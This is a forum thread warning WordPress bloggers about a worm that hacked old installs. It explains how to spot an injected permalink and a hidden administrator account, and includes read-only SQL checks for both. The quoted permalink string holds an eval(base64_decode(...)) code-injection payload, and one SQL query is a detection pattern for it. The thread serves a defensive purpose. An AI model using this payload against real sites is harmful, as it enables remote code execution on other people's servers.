WordPress Under Attack.. check your blog


sOliver

There has been a mass attack. A lot of WordPress blogs were hacked yesterday.. I think everyone should check their blogs now, because you might not even know that your blog is hacked.

Here's a quick guide on how to find out if you have been hacked.

0. Look at your permalinks. If there is a string attached like the one below, you have been hacked:
PHP:
/month/year/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/.

1. Go to your WordPress Admin Site
2. Under "Users" -> "Authors & Users" you will find all users, click on "Administrators".
3. Pay attention closely. If you see another name there (for a second only) you might have been hacked. Verify the number of administrators at the top. Remember the name of the unknown admin. In my case it was something like "EarnestCummingham".

4. Go to your phpMyAdmin site and open the table "wp_usermeta".
5. Locate "EarnestCummingham" or a user with "wp_user_level" = "10".
6. Delete the user
7. Upgrade your WordPress blog to 2.8.4 (secure)

How to make your blog even more secure?
8. Read the full article at WebmasterWeblog.com

I hope this helps some people.. maybe you have been hacked and don't even know it .. that kinda scares me. A lot of people will not notice this and the hackers will then get what they want .. simply disgusts me
 
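The checks from steps 0 to 5 above, written as read-only queries that can be pasted into the phpMyAdmin SQL tab. This is an added example, not part of the original post; it assumes MySQL and the default "wp_" table prefix, so adjust the table and meta key names if your install uses a different prefix.

```sql
-- Assumption: default "wp_" table prefix. All three queries only read data.

-- 1. Every account with administrator level (wp_user_level = 10),
--    newest first, so an account you did not create stands out.
SELECT u.ID, u.user_login, u.user_email, u.user_registered
FROM wp_users AS u
JOIN wp_usermeta AS m ON m.user_id = u.ID
WHERE m.meta_key = 'wp_user_level'
  AND m.meta_value = '10'
ORDER BY u.user_registered DESC;

-- 2. Count of accounts holding the administrator role. Compare this
--    number with the administrator count shown at the top of the
--    Users screen (step 3); a mismatch points to a hidden account.
SELECT COUNT(DISTINCT m.user_id) AS admin_accounts
FROM wp_usermeta AS m
WHERE m.meta_key = 'wp_capabilities'
  AND m.meta_value LIKE '%administrator%';

-- 3. Permalink setting (step 0): a clean value contains only
--    placeholders such as %year% or %postname%. Any row returned
--    here means code was appended to the permalink structure.
SELECT option_name, option_value
FROM wp_options
WHERE option_name = 'permalink_structure'
  AND (option_value LIKE '%eval(%'
       OR option_value LIKE '%base64_decode%'
       OR option_value LIKE '%HTTP_REFERER%');
```

Query 3 returning zero rows and queries 1 and 2 showing only accounts you recognise is the expected result on a clean install.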
Thanks for the warning. Reminds us how important keeping your software up-to-date is.
 
This was from a worm attacking old versions. You should always update to new versions when possible to avoid such avoidable instances.
 
Update, update and update again
 
If you have updated to the latest WordPress version, it's quite enough.
 